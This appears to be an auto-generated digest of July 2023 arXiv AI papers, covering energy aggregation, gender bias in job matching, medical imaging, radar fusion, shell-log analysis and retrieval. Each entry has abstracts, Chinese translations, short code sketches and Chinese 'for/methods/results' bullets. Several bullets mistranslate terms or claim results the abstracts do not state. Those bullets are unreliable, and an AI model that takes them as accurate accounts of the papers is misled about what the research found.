    摘要 生物医学数据集通常被建模为知识图谱(KG),因为知识图谱能够刻画生物医学系统的多关系、异质和动态特性。因此,知识图谱补全(KGC)可以帮助研究人员进行预测,为药物重定位等任务提供支持。以往的 KGC 方法要么基于规则,要么基于嵌入,而基于神经符号人工智能的混合方法正变得越来越流行。其中许多方法具有独特的性质,使其更适合应对生物医学领域的挑战。本文综述了这类方法,并着重讨论其在生物医学中的用途与潜在益处。

A Novel Multiagent Flexibility Aggregation Framework

  • paper_url: http://arxiv.org/abs/2307.08401
  • repo_url: None
  • paper_authors: Stavros Orfanoudakis, Georgios Chalkiadakis
  • for: 提高Distributed Energy Resources(DERs)在智能电网中的有效利用,建立一种智能多代理框架来管理DERs。
  • methods: 提出了一种新的 DER 聚合框架,包括多智能体体系结构和多种类型的机制,以便将 DERs 有效地整合进电网。
  • results: 实验表明,该框架可以有效地将各种不同的DERs集成到Grid中,并且可以提高参与者的平均支付。使用CRPS分数规则选择机制可以提高参与者的预测准确率。
    Abstract The increasing number of Distributed Energy Resources (DERs) in the emerging Smart Grid, has created an imminent need for intelligent multiagent frameworks able to utilize these assets efficiently. In this paper, we propose a novel DER aggregation framework, encompassing a multiagent architecture and various types of mechanisms for the effective management and efficient integration of DERs in the Grid. One critical component of our architecture is the Local Flexibility Estimators (LFEs) agents, which are key for offloading the Aggregator from serious or resource-intensive responsibilities -- such as addressing privacy concerns and predicting the accuracy of DER statements regarding their offered demand response services. The proposed framework allows the formation of efficient LFE cooperatives. To this end, we developed and deployed a variety of cooperative member selection mechanisms, including (a) scoring rules, and (b) (deep) reinforcement learning. We use data from the well-known PowerTAC simulator to systematically evaluate our framework. Our experiments verify its effectiveness for incorporating heterogeneous DERs into the Grid in an efficient manner. In particular, when using the well-known probabilistic prediction accuracy-incentivizing CRPS scoring rule as a selection mechanism, our framework results in increased average payments for participants, when compared with traditional commercial aggregators.
    摘要 随着分布式能源资源(DERs)在智能电网中的增加,需要有效地利用这些资源已成为一项紧迫的需求。本文提出了一种新的DER集成框架,包括多智能体架构和不同类型的机制,以便有效管理和有效地吸收DERs在电网中。本文中的一个关键组件是地方flexibility估计(LFEs)代理,它们可以减轻集成器的负担,例如处理隐私问题和预测DERs提供的需求回应服务的准确性。我们的框架允许形成高效的LFE合作社。为此,我们开发了和部署了多种合作社员选择机制,包括(a)分数规则,以及(b)深度鼓励学习。我们使用PowerTAC simulator中的数据进行系统性评估我们的框架。我们的实验表明,当使用CRPS分数规则作为选择机制时,我们的框架可以有效地吸收不同类型的DERs。
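
The abstract mentions the CRPS scoring rule as a cooperative-member selection mechanism; the sketch below computes the Continuous Ranked Probability Score for an empirical (ensemble) forecast, which is one standard way such a prediction-accuracy score can be evaluated. The forecast values and observation are made up, and the actual selection mechanisms are described in the paper.

```python
import numpy as np

def crps_ensemble(forecast_samples, observation):
    """CRPS for an empirical ensemble forecast: E|X - y| - 0.5 * E|X - X'| (lower is better)."""
    x = np.asarray(forecast_samples, dtype=float)
    term1 = np.abs(x - observation).mean()
    term2 = 0.5 * np.abs(x[:, None] - x[None, :]).mean()
    return term1 - term2

# Toy usage: a DER agent's probabilistic forecast of offered flexibility (kW) vs the realized value.
score = crps_ensemble([4.8, 5.1, 5.4, 4.9, 5.0], observation=5.2)
```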

Gender mobility in the labor market with skills-based matching models

  • paper_url: http://arxiv.org/abs/2307.08368
  • repo_url: None
  • paper_authors: Ajaya Adhikari, Steven Vethman, Daan Vos, Marc Lenz, Ioana Cocu, Ioannis Tolios, Cor J. Veenman
  • for: 本研究旨在探讨基于技能匹配的劳动市场流动性是否会促进性别分布的调整。
  • methods: 研究使用了语言模型和监督学习方法,包括bag of words、word2vec和BERT语言表示,以及不同的距离度量(静止和机器学习基于的)。
  • results: 研究发现,基于技能匹配的模型会传递性别分布偏见,而不同的语言表示和距离度量可能会影响模型的匹配性和风险。
    Abstract Skills-based matching promises mobility of workers between different sectors and occupations in the labor market. In this case, job seekers can look for jobs they do not yet have experience in, but for which they do have relevant skills. Currently, there are multiple occupations with a skewed gender distribution. For skills-based matching, it is unclear if and how a shift in the gender distribution, which we call gender mobility, between occupations will be effected. It is expected that the skills-based matching approach will likely be data-driven, including computational language models and supervised learning methods. This work, first, shows the presence of gender segregation in language model-based skills representation of occupations. Second, we assess the use of these representations in a potential application based on simulated data, and show that the gender segregation is propagated by various data-driven skills-based matching models.These models are based on different language representations (bag of words, word2vec, and BERT), and distance metrics (static and machine learning-based). Accordingly, we show how skills-based matching approaches can be evaluated and compared on matching performance as well as on the risk of gender segregation. Making the gender segregation bias of models more explicit can help in generating healthy trust in the use of these models in practice.
    摘要 基于技能的匹配有望使劳动者在劳动力市场中跨部门、跨职业流动。在这种情况下,求职者可以寻找自己尚无从业经验、但已具备相关技能的工作。目前,不少职业的性别分布存在明显倾斜。对于基于技能的匹配,职业之间性别分布的变化(即性别流动性)是否会发生以及如何发生尚不清楚。预计基于技能的匹配方法将是数据驱动的,包括计算语言模型和监督学习方法。本研究首先表明,基于语言模型的职业技能表示中存在性别隔离;其次,我们在基于模拟数据的潜在应用中评估了这些表示的使用,并表明多种数据驱动的技能匹配模型会传播这种性别隔离。这些模型基于不同的语言表示(词袋、word2vec和BERT)和距离度量(静态的以及基于机器学习的)。据此,我们展示了如何从匹配性能和性别隔离风险两方面对技能匹配方法进行评估和比较。让模型的性别隔离偏差更加明确,有助于在实践中建立对这些模型的健康信任。
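    As a toy illustration of how a skills-based matcher built on vector representations can reproduce the gender skew of the source occupations, the sketch below matches workers to occupations by cosine similarity over bag-of-words-style skill vectors. The skill vocabulary, occupation profiles and worker data are all invented, and the paper's actual models (word2vec, BERT, learned distance metrics) are far richer.

```python
import numpy as np

# Toy skill vocabulary and occupation profiles (bag-of-words counts); purely illustrative.
skills = ["welding", "care", "planning", "python", "sales"]
occupations = {
    "mechanic": np.array([3, 0, 1, 0, 0], dtype=float),
    "nurse":    np.array([0, 3, 1, 0, 1], dtype=float),
    "analyst":  np.array([0, 0, 1, 3, 1], dtype=float),
}

def cosine(a, b):
    return a @ b / (np.linalg.norm(a) * np.linalg.norm(b) + 1e-9)

def match(worker_vec):
    """Return the occupation whose skill profile is closest to the worker's skills."""
    return max(occupations, key=lambda occ: cosine(worker_vec, occupations[occ]))

# Workers come from gender-skewed source occupations, so their skills inherit that skew.
workers = [("F", occupations["nurse"] + 0.1), ("F", occupations["nurse"]),
           ("M", occupations["mechanic"]), ("M", occupations["mechanic"] + 0.1)]

assignments = [(g, match(vec)) for g, vec in workers]
for occ in occupations:
    share_f = np.mean([g == "F" for g, o in assignments if o == occ] or [0.0])
    print(occ, "female share after matching:", share_f)
# Skill vectors derived from segregated occupations reproduce the segregation after matching.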

M-FLAG: Medical Vision-Language Pre-training with Frozen Language Models and Latent Space Geometry Optimization

  • paper_url: http://arxiv.org/abs/2307.08347
  • repo_url: https://github.com/cheliu-computation/m-flag-miccai2023
  • paper_authors: Che Liu, Sibo Cheng, Chen Chen, Mengyun Qiao, Weitong Zhang, Anand Shah, Wenjia Bai, Rossella Arcucci
  • for: 这篇论文旨在提出一种新的医疗影像语言模型预训方法,以提高医疗影像和临床文本之间的联合学习。
  • methods: 提案方法称为医疗影像语言预训(M-FLAG),利用冻结的语言模型来稳定训练过程,并导入一个新的正交对角对映损失函数来调和隐藏空间几何。
  • results: 实验结果显示,M-FLAG可以与现有的医疗影像语言预训方法相比,在三个下游任务中表现出色,包括医疗影像分类、分割和物体检测。尤其是在分割任务中,M-FLAG只使用RSNA数据集的1%,仍能超越已经精通ImageNet预训模型的 Fine-tuning 。
    Abstract Medical vision-language models enable co-learning and integrating features from medical imaging and clinical text. However, these models are not easy to train and the latent representation space can be complex. Here we propose a novel way for pre-training and regularising medical vision-language models. The proposed method, named Medical vision-language pre-training with Frozen language models and Latent spAce Geometry optimization (M-FLAG), leverages a frozen language model for training stability and efficiency and introduces a novel orthogonality loss to harmonize the latent space geometry. We demonstrate the potential of the pre-trained model on three downstream tasks: medical image classification, segmentation, and object detection. Extensive experiments across five public datasets demonstrate that M-FLAG significantly outperforms existing medical vision-language pre-training approaches and reduces the number of parameters by 78\%. Notably, M-FLAG achieves outstanding performance on the segmentation task while using only 1\% of the RSNA dataset, even outperforming ImageNet pre-trained models that have been fine-tuned using 100\% of the data.
    摘要 医疗视觉语言模型可以联合学习医疗影像和临床文本的特征。然而,这类模型训练难度较大,其潜在表示空间也可能很复杂。在本文中,我们提出了一种新的医疗视觉语言预训练与正则化方法,名为M-FLAG。M-FLAG利用冻结的语言模型来保证训练的稳定性和效率,并引入一种新的正交性损失来调和潜在空间的几何结构。我们在三个下游任务(医疗影像分类、分割和目标检测)上展示了预训练模型的潜力。在五个公开数据集上的大量实验表明,M-FLAG显著优于现有的医疗视觉语言预训练方法,并将参数数量减少了78%。尤其是在分割任务上,M-FLAG仅使用RSNA数据集的1%,就超过了使用100%数据微调的ImageNet预训练模型。
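    The abstract says M-FLAG keeps the language model frozen and adds an orthogonality loss to harmonize the latent-space geometry, but does not spell out the exact formulation. The sketch below is therefore only a stand-in: a common orthogonality penalty on the image latent space combined with a simple cosine alignment term; names, dimensions and the loss weight are assumptions.

```python
import torch
import torch.nn.functional as F

def orthogonality_loss(z: torch.Tensor) -> torch.Tensor:
    """Penalize correlation between embedding dimensions: ||Z_norm^T Z_norm - I||_F^2.
    One common way to regularize latent-space geometry; the paper's exact loss may differ."""
    z = F.normalize(z - z.mean(dim=0), dim=0)        # center, then unit-norm each dimension
    gram = z.T @ z                                    # (d, d) correlation-like matrix
    eye = torch.eye(gram.size(0), device=z.device)
    return ((gram - eye) ** 2).sum()

def mflag_style_loss(img_emb, txt_emb, lam=0.1):
    """Alignment (cosine) between image embeddings and frozen-LM text embeddings,
    plus an orthogonality regularizer on the image latent space."""
    align = 1.0 - F.cosine_similarity(img_emb, txt_emb, dim=-1).mean()
    return align + lam * orthogonality_loss(img_emb)

# img_emb requires grad (trainable vision encoder); txt_emb would come from a frozen LM.
img_emb = torch.randn(32, 128, requires_grad=True)
txt_emb = torch.randn(32, 128)
loss = mflag_style_loss(img_emb, txt_emb)
loss.backward()
print(float(loss))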

Multi-Task Cross-Modality Attention-Fusion for 2D Object Detection

  • paper_url: http://arxiv.org/abs/2307.08339
  • repo_url: None
  • paper_authors: Huawei Sun, Hao Feng, Georg Stettinger, Lorenzo Servadei, Robert Wille
  • for: 本研究旨在提高自动驾驶中的精准和可靠对象检测,尤其是在不良天气和夜间场景下。
  • methods: 本研究提出了两种新的雷达处理技术,以更好地与摄像头数据相匹配。此外,我们还提出了一种多任务交叉模态注意力融合网络(MCAF-Net),用于对象检测和自由空间分割。
  • results: 我们的方法在nuScenes数据集上比现有的雷达摄像头融合基于对象检测器表现更好,特别是在不良天气和夜间场景下。我们的方法还能够更好地利用特征地图信息,从而提高对象检测的精度和可靠性。
    Abstract Accurate and robust object detection is critical for autonomous driving. Image-based detectors face difficulties caused by low visibility in adverse weather conditions. Thus, radar-camera fusion is of particular interest but presents challenges in optimally fusing heterogeneous data sources. To approach this issue, we propose two new radar preprocessing techniques to better align radar and camera data. In addition, we introduce a Multi-Task Cross-Modality Attention-Fusion Network (MCAF-Net) for object detection, which includes two new fusion blocks. These allow for exploiting information from the feature maps more comprehensively. The proposed algorithm jointly detects objects and segments free space, which guides the model to focus on the more relevant part of the scene, namely, the occupied space. Our approach outperforms current state-of-the-art radar-camera fusion-based object detectors in the nuScenes dataset and achieves more robust results in adverse weather conditions and nighttime scenarios.
    摘要 自动驾驶需要精准且鲁棒的目标检测,而基于图像的检测器在恶劣天气条件下的低能见度中会遇到困难。因此,雷达-相机融合备受关注,但如何最优地融合异构数据源仍是一个挑战。为解决这一问题,我们提出了两种新的雷达预处理技术,以更好地对齐雷达和相机数据。此外,我们还提出了一种多任务跨模态注意力融合网络(MCAF-Net)用于目标检测,其中包含两种新的融合模块,可以更全面地利用特征图中的信息。该方法同时进行目标检测和可行驶空间分割,引导模型聚焦于场景中更相关的部分,即被占用的空间。我们的方法在nuScenes数据集上优于当前最先进的雷达-相机融合目标检测器,并在恶劣天气和夜间场景中取得了更稳健的结果。

Analyzing the Impact of Adversarial Examples on Explainable Machine Learning

  • paper_url: http://arxiv.org/abs/2307.08327
  • repo_url: None
  • paper_authors: Prathyusha Devabhakthini, Sasmita Parida, Raj Mani Shukla, Suvendu Chandan Nayak
  • for: 本研究探讨了因为对深度学习模型的抗击攻击而导致的模型解释性的影响,尤其是在文本分类问题上。
  • methods: 我们开发了一个基于机器学习的文本数据分类模型,然后引入了对文本数据的抗击偏移来评估模型的分类性能 после攻击。
  • results: 我们发现了对文本数据的抗击偏移会导致模型的解释性受到影响,并且我们可以通过分析模型的解释来理解攻击后模型的性能下降的原因。
    Abstract Adversarial attacks are a type of attack on machine learning models where an attacker deliberately modifies the inputs to cause the model to make incorrect predictions. Adversarial attacks can have serious consequences, particularly in applications such as autonomous vehicles, medical diagnosis, and security systems. Work on the vulnerability of deep learning models to adversarial attacks has shown that it is very easy to make samples that make a model predict things that it doesn't want to. In this work, we analyze the impact of model interpretability due to adversarial attacks on text classification problems. We develop an ML-based classification model for text data. Then, we introduce the adversarial perturbations on the text data to understand the classification performance after the attack. Subsequently, we analyze and interpret the model's explainability before and after the attack
    摘要 对抗攻击是针对机器学习模型的一类攻击:攻击者故意修改输入,使模型做出错误预测。这类攻击可能带来严重后果,特别是在自动驾驶、医疗诊断和安全系统等应用中。已有研究表明,深度学习模型在对抗攻击面前非常脆弱,很容易构造出使模型给出非预期预测的样本。在本工作中,我们分析了对抗攻击对文本分类问题中模型可解释性的影响。我们首先构建了一个基于机器学习的文本分类模型,然后对文本数据引入对抗扰动,以评估攻击后的分类性能,并进一步分析和解读模型在攻击前后的可解释性。
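    As a toy illustration of the pipeline described above (train a text classifier, perturb the input, compare predictions and explanations), the sketch below uses a TF-IDF plus logistic-regression model, a crude character-level perturbation, and a weight-times-feature explanation. The paper does not specify its exact model, attack, or explanation method, so everything here is illustrative.

```python
import numpy as np
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression

texts = ["great movie loved it", "terrible film hated it",
         "wonderful acting great plot", "awful boring waste of time"]
labels = [1, 0, 1, 0]

vec = TfidfVectorizer()
X = vec.fit_transform(texts)
clf = LogisticRegression().fit(X, labels)

def explain(text, top_k=3):
    """Simple explanation: the features contributing most to the decision score."""
    x = vec.transform([text]).toarray()[0]
    contrib = x * clf.coef_[0]
    idx = np.argsort(-np.abs(contrib))[:top_k]
    names = vec.get_feature_names_out()
    return [(names[i], round(float(contrib[i]), 3)) for i in idx if contrib[i] != 0]

clean = "great movie loved it"
adversarial = "gre at movie lov ed it"   # character-level perturbation of the key words
for t in (clean, adversarial):
    pred = clf.predict(vec.transform([t]))[0]
    print(t, "->", pred, explain(t))
# After the perturbation the sentiment-bearing features vanish from the vocabulary,
# so the explanation collapses and the prediction may change.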

LogPrécis: Unleashing Language Models for Automated Shell Log Analysis

  • paper_url: http://arxiv.org/abs/2307.08309
  • repo_url: None
  • paper_authors: Matteo Boffa, Rodolfo Vieira Valentim, Luca Vassio, Danilo Giordano, Idilio Drago, Marco Mellia, Zied Ben Houidi
  • for: 本研究旨在利用语言模型(LM)自动分析文本类 Unix shell 攻击日志,以提高安全专家对攻击行为的理解和诊断。
  • methods: 本研究使用了当今最佳的 LM 技术,开发了名为 LogPr'ecis 的系统,可以对 Unix shell 会话进行自动分析,并将攻击者策略分配给每个会话部分。
  • results: 对两个大数据集,包含约400,000个 Unix shell 攻击,LogPr'ecis 可以将其缩减为约3,000个指纹,每个指纹都是Session中的攻击者策略的序列。LogPr'ecis 提供的抽象可以帮助分析员更好地理解攻击,识别指纹,检测新型攻击、连接相似攻击和跟踪家族和变化。
    Abstract The collection of security-related logs holds the key to understanding attack behaviors and diagnosing vulnerabilities. Still, their analysis remains a daunting challenge. Recently, Language Models (LMs) have demonstrated unmatched potential in understanding natural and programming languages. The question arises whether and how LMs could be also useful for security experts since their logs contain intrinsically confused and obfuscated information. In this paper, we systematically study how to benefit from the state-of-the-art in LM to automatically analyze text-like Unix shell attack logs. We present a thorough design methodology that leads to LogPr\'ecis. It receives as input raw shell sessions and automatically identifies and assigns the attacker tactic to each portion of the session, i.e., unveiling the sequence of the attacker's goals. We demonstrate LogPr\'ecis capability to support the analysis of two large datasets containing about 400,000 unique Unix shell attacks. LogPr\'ecis reduces them into about 3,000 fingerprints, each grouping sessions with the same sequence of tactics. The abstraction it provides lets the analyst better understand attacks, identify fingerprints, detect novelty, link similar attacks, and track families and mutations. Overall, LogPr\'ecis, released as open source, paves the way for better and more responsive defense against cyberattacks.
    摘要 安全相关日志的收集是理解攻击行为、诊断漏洞的关键,但对这些日志的分析仍然是一项艰巨的挑战。近来,语言模型(LM)在理解自然语言和编程语言方面展现出无与伦比的潜力。问题在于,LM是否以及如何也能帮助安全专家,因为这些日志中的信息本质上是混乱且经过混淆的。在本文中,我们系统地研究了如何利用最先进的LM来自动分析文本形式的Unix shell攻击日志。我们提出了一套完整的设计方法,最终形成了LogPr\'ecis。它以原始shell会话为输入,自动识别并为会话的每一部分标注攻击者策略,即揭示攻击者目标的先后顺序。我们展示了LogPr\'ecis对两个大型数据集(包含约40万个独特的Unix shell攻击)的分析能力:LogPr\'ecis将它们归约为约3,000个指纹,每个指纹聚合了具有相同策略序列的会话。这种抽象使分析人员能够更好地理解攻击、识别指纹、检测新型攻击、关联相似攻击,并追踪攻击家族及其变种。总体而言,作为开源发布的LogPr\'ecis为更好、更及时地防御网络攻击铺平了道路。
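    Once each portion of a session has been tagged with an attacker tactic, collapsing sessions into fingerprints is straightforward. The sketch below shows one simple way to do it; the tactic labels and sessions are invented, and the real system derives the tags with a language model rather than by hand.

```python
from collections import defaultdict

# Each session is a list of (shell_snippet, tactic) pairs, as produced by a tactic tagger.
sessions = [
    [("wget http://x/y.sh", "Execution"), ("chmod +x y.sh", "Execution"), ("./y.sh", "Impact")],
    [("wget http://z/a.sh", "Execution"), ("chmod +x a.sh", "Execution"), ("./a.sh", "Impact")],
    [("cat /etc/passwd", "Discovery"), ("uname -a", "Discovery")],
]

def fingerprint(session):
    """A fingerprint here is the ordered sequence of tactics, with consecutive repeats collapsed."""
    tactics = [t for _, t in session]
    collapsed = [t for i, t in enumerate(tactics) if i == 0 or t != tactics[i - 1]]
    return tuple(collapsed)

groups = defaultdict(list)
for s in sessions:
    groups[fingerprint(s)].append(s)

for fp, members in groups.items():
    print(fp, "->", len(members), "session(s)")
# ('Execution', 'Impact') -> 2 session(s); ('Discovery',) -> 1 session(s)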

A Novel Multi-Task Model Imitating Dermatologists for Accurate Differential Diagnosis of Skin Diseases in Clinical Images

  • paper_url: http://arxiv.org/abs/2307.08308
  • repo_url: None
  • paper_authors: Yan-Jie Zhou, Wei Liu, Yuan Gao, Jing Xu, Le Lu, Yuping Duan, Hao Cheng, Na Jin, Xiaoyong Man, Shuang Zhao, Yu Wang
  • for: 这个研究旨在提出一个具有执行力的电脑支持 skin 疾病诊断方法,以帮助皮肤科医生和患者更好地诊断皮肤疾病。
  • methods: 本研究提出了一个名为 DermImitFormer 的多任务模型,该模型通过多任务学习同时预测身体部位和肿瘤特征以及疾病本身,从而提高诊断精度和诊断解释性。此外,研究还提出了一个精确地 zoom-in 到肿瘤特征的选择模组,以及一个模型 complicated 的诊断推理之间的交互模块。
  • results: 实验结果显示,DermImitFormer 在三个不同的数据集上均能够实现顶尖的识别性能,并且在诊断皮肤疾病中具有更高的精度和解释性。
    Abstract Skin diseases are among the most prevalent health issues, and accurate computer-aided diagnosis methods are of importance for both dermatologists and patients. However, most of the existing methods overlook the essential domain knowledge required for skin disease diagnosis. A novel multi-task model, namely DermImitFormer, is proposed to fill this gap by imitating dermatologists' diagnostic procedures and strategies. Through multi-task learning, the model simultaneously predicts body parts and lesion attributes in addition to the disease itself, enhancing diagnosis accuracy and improving diagnosis interpretability. The designed lesion selection module mimics dermatologists' zoom-in action, effectively highlighting the local lesion features from noisy backgrounds. Additionally, the presented cross-interaction module explicitly models the complicated diagnostic reasoning between body parts, lesion attributes, and diseases. To provide a more robust evaluation of the proposed method, a large-scale clinical image dataset of skin diseases with significantly more cases than existing datasets has been established. Extensive experiments on three different datasets consistently demonstrate the state-of-the-art recognition performance of the proposed approach.
    摘要 皮肤病是最常见的健康问题之一,准确的计算机辅助诊断方法对皮肤科医生和患者都非常重要。然而,现有的大多数方法忽略了皮肤病诊断所需的关键领域知识。本文提出了一种新的多任务模型DermImitFormer,通过模仿皮肤科医生的诊断流程和策略来弥补这一不足。借助多任务学习,模型在预测疾病的同时还预测身体部位和皮损属性,从而提高诊断准确性和诊断可解释性。所设计的皮损选择模块模仿了皮肤科医生的放大查看(zoom-in)操作,能够有效地从嘈杂背景中突出局部皮损特征。此外,提出的交叉交互模块显式建模了身体部位、皮损属性与疾病之间复杂的诊断推理关系。为了更稳健地评估所提方法,我们建立了一个大规模的皮肤病临床图像数据集,其病例数量显著多于现有数据集。在三个不同数据集上的大量实验一致表明,所提方法具有最先进的识别性能。

Efficient Computation of Counterfactual Bounds

  • paper_url: http://arxiv.org/abs/2307.08304
  • repo_url: None
  • paper_authors: Marco Zaffalon, Alessandro Antonucci, Rafael Cabañas, David Huber, Dario Azzimonti
  • for: 本研究的目的是计算基于部分可Identifiable counterfactual queries的上下文 bounds。
  • methods: 本研究使用了从Structural causal model maps to credal nets的方法,以及基于 credal nets的算法来计算 exact counterfactual bounds。
  • results: 研究表明,使用 causal EM scheme可以得到准确的approximate bounds,并且通过提供credible intervals来评估其准确性。Synthetic benchmark表明,EM scheme在一定数量的运行中能够实现准确的结果。此外,研究还指出了一种常neglected的限制,即counterfactual bounds计算不需要知道结构方程的情况下是不可靠的。
    Abstract We assume to be given structural equations over discrete variables inducing a directed acyclic graph, namely, a structural causal model, together with data about its internal nodes. The question we want to answer is how we can compute bounds for partially identifiable counterfactual queries from such an input. We start by giving a map from structural casual models to credal networks. This allows us to compute exact counterfactual bounds via algorithms for credal nets on a subclass of structural causal models. Exact computation is going to be inefficient in general given that, as we show, causal inference is NP-hard even on polytrees. We target then approximate bounds via a causal EM scheme. We evaluate their accuracy by providing credible intervals on the quality of the approximation; we show through a synthetic benchmark that the EM scheme delivers accurate results in a fair number of runs. In the course of the discussion, we also point out what seems to be a neglected limitation to the trending idea that counterfactual bounds can be computed without knowledge of the structural equations. We also present a real case study on palliative care to show how our algorithms can readily be used for practical purposes.
    摘要 我们假设给定了定义在离散变量上、诱导出有向无环图的结构方程,即一个结构因果模型,以及其内部节点的数据。我们要回答的问题是:如何基于这样的输入计算部分可识别的反事实查询的界。我们首先给出从结构因果模型到credal网络的映射,从而可以在一类结构因果模型上借助credal网络的算法计算精确的反事实界。但精确计算在一般情况下效率低下,因为正如我们所证明的,即使在多叉树(polytree)上因果推断也是NP困难的。因此我们转向基于因果EM方案的近似界,并通过给出近似质量的可信区间来评估其精度;一个合成基准表明,EM方案在相当数量的运行内就能给出准确的结果。在讨论过程中,我们还指出了"无需知道结构方程即可计算反事实界"这一流行观点的一个常被忽视的局限。我们还给出了一个关于姑息治疗(palliative care)的真实案例研究,说明我们的算法可以直接用于实际目的。

Soft Prompt Tuning for Augmenting Dense Retrieval with Large Language Models

  • paper_url: http://arxiv.org/abs/2307.08303
  • repo_url: https://github.com/zhiyuanpeng/sptar
  • paper_authors: Zhiyuan Peng, Xuyang Wu, Yi Fang
  • for: 这篇论文主要针对的是提高密集检索(DR)模型的性能,特别是在缺乏领域特定训练数据的情况下。
  • methods: 论文提出了一种基于软提示调优的方法(SPTAR),通过优化任务特定的软提示来提升LLM的表现,并利用这些提示为无标注文档标注弱查询。
  • results: 实验表明,SPTAR超越了无监督基线BM25以及最新提出的基于LLM的DR增强方法。
    Abstract Dense retrieval (DR) converts queries and documents into dense embeddings and measures the similarity between queries and documents in vector space. One of the challenges in DR is the lack of domain-specific training data. While DR models can learn from large-scale public datasets like MS MARCO through transfer learning, evidence shows that not all DR models and domains can benefit from transfer learning equally. Recently, some researchers have resorted to large language models (LLMs) to improve the zero-shot and few-shot DR models. However, the hard prompts or human-written prompts utilized in these works cannot guarantee the good quality of generated weak queries. To tackle this, we propose soft prompt tuning for augmenting DR (SPTAR): For each task, we leverage soft prompt-tuning to optimize a task-specific soft prompt on limited ground truth data and then prompt the LLMs to tag unlabeled documents with weak queries, yielding enough weak document-query pairs to train task-specific dense retrievers. We design a filter to select high-quality example document-query pairs in the prompt to further improve the quality of weak tagged queries. To the best of our knowledge, there is no prior work utilizing soft prompt tuning to augment DR models. The experiments demonstrate that SPTAR outperforms the unsupervised baselines BM25 and the recently proposed LLMs-based augmentation method for DR.
    摘要 密集检索(DR)将查询和文档转换为稠密向量表示,并在向量空间中度量查询与文档的相似性。DR的一个挑战是缺乏领域特定的训练数据。虽然DR模型可以通过迁移学习从MS MARCO等大规模公开数据集中学习,但有证据表明并非所有DR模型和领域都能同等地从迁移学习中获益。最近,一些研究者借助大语言模型(LLM)来改进零样本和少样本DR模型;然而,这些工作所使用的硬提示或人工撰写的提示无法保证生成的弱查询的质量。为解决这一问题,我们提出了用于增强DR的软提示调优方法(SPTAR):针对每个任务,我们先在有限的真实标注数据上通过软提示调优得到任务特定的软提示,再用其提示LLM为无标注文档打上弱查询标签,从而获得足够的弱文档-查询对来训练任务特定的密集检索器。我们还设计了一个过滤器,用于在提示中挑选高质量的示例文档-查询对,进一步提升弱标注查询的质量。据我们所知,此前还没有利用软提示调优来增强DR模型的工作。实验结果表明,SPTAR超越了无监督基线BM25以及最近提出的基于LLM的DR增强方法。
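    A minimal sketch of the soft-prompt idea: a small set of learnable vectors is prepended to the frozen model's input embeddings and is the only thing optimized. All names and dimensions below are placeholders, and SPTAR's full pipeline (prompting the LLM to tag unlabeled documents and filtering the resulting weak pairs) is not shown.

```python
import torch
import torch.nn as nn

class SoftPrompt(nn.Module):
    """Learnable prompt vectors prepended to a frozen model's input embeddings."""
    def __init__(self, n_prompt_tokens: int, d_model: int):
        super().__init__()
        self.prompt = nn.Parameter(torch.randn(n_prompt_tokens, d_model) * 0.02)

    def forward(self, token_embeddings: torch.Tensor) -> torch.Tensor:
        # token_embeddings: (batch, seq_len, d_model)
        batch = token_embeddings.size(0)
        prompt = self.prompt.unsqueeze(0).expand(batch, -1, -1)
        return torch.cat([prompt, token_embeddings], dim=1)

# Usage sketch: only the soft prompt is optimized; the LLM's own weights stay frozen.
d_model, vocab = 768, 32000
frozen_embed = nn.Embedding(vocab, d_model)
frozen_embed.weight.requires_grad_(False)

soft_prompt = SoftPrompt(n_prompt_tokens=10, d_model=d_model)
optimizer = torch.optim.AdamW(soft_prompt.parameters(), lr=1e-3)

input_ids = torch.randint(0, vocab, (4, 16))
inputs_embeds = soft_prompt(frozen_embed(input_ids))   # (4, 26, 768), fed to the frozen LLM
print(inputs_embeds.shape)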

ShiftNAS: Improving One-shot NAS via Probability Shift

  • paper_url: http://arxiv.org/abs/2307.08300
  • repo_url: https://github.com/bestfleer/shiftnas
  • paper_authors: Mingyang Zhang, Xinyi Yu, Haodong Zhao, Linlin Ou
  • for: 一种时间效率的 neural architecture search (NAS) 方法,可以在不同的复杂度情况下获得最优的子网架构和参数,只需要训练一次。
  • methods: 我们使用 shiftNAS,一种可以根据子网的复杂度调整抽象概率的方法,以及一种可以准确地提供子网的架构的建立方法。
  • results: 我们在多种视觉网络模型,包括卷积神经网络 (CNNs) 和视transformers (ViTs) 上进行了实验,并证明了 shiftNAS 是模型无关的。实验结果表明,shiftNAS 可以在 ImageNet 上提高一键 NAS 的性能,而无需额外的资源消耗。
    Abstract One-shot Neural architecture search (One-shot NAS) has been proposed as a time-efficient approach to obtain optimal subnet architectures and weights under different complexity cases by training only once. However, the subnet performance obtained by weight sharing is often inferior to the performance achieved by retraining. In this paper, we investigate the performance gap and attribute it to the use of uniform sampling, which is a common approach in supernet training. Uniform sampling concentrates training resources on subnets with intermediate computational resources, which are sampled with high probability. However, subnets with different complexity regions require different optimal training strategies for optimal performance. To address the problem of uniform sampling, we propose ShiftNAS, a method that can adjust the sampling probability based on the complexity of subnets. We achieve this by evaluating the performance variation of subnets with different complexity and designing an architecture generator that can accurately and efficiently provide subnets with the desired complexity. Both the sampling probability and the architecture generator can be trained end-to-end in a gradient-based manner. With ShiftNAS, we can directly obtain the optimal model architecture and parameters for a given computational complexity. We evaluate our approach on multiple visual network models, including convolutional neural networks (CNNs) and vision transformers (ViTs), and demonstrate that ShiftNAS is model-agnostic. Experimental results on ImageNet show that ShiftNAS can improve the performance of one-shot NAS without additional consumption. Source codes are available at https://github.com/bestfleer/ShiftNAS.
    摘要 一次性神经结构搜索(One-shot NAS)作为一种省时的方法被提出,只需训练一次,即可在不同复杂度约束下获得最优的子网结构和权重。然而,通过权重共享得到的子网性能往往不如重新训练所达到的性能。在本文中,我们研究了这一性能差距,并将其归因于超网训练中常用的均匀采样:均匀采样会把训练资源集中在计算资源处于中间水平、被高概率采样的子网上,而不同复杂度区间的子网需要不同的最优训练策略。为解决均匀采样的问题,我们提出了ShiftNAS,它可以根据子网的复杂度调整采样概率。我们通过评估不同复杂度子网的性能变化来实现这一点,并设计了一个能够准确、高效地给出指定复杂度子网的结构生成器。采样概率和结构生成器都可以端到端地以基于梯度的方式训练。借助ShiftNAS,我们可以针对给定的计算复杂度直接获得最优的模型结构和参数。我们在多种视觉网络模型(包括卷积神经网络CNN和视觉Transformer ViT)上进行了实验,证明ShiftNAS与模型无关。在ImageNet上的实验结果表明,ShiftNAS可以在不增加额外开销的情况下提升一次性NAS的性能。代码可在 https://github.com/bestfleer/ShiftNAS 获取。
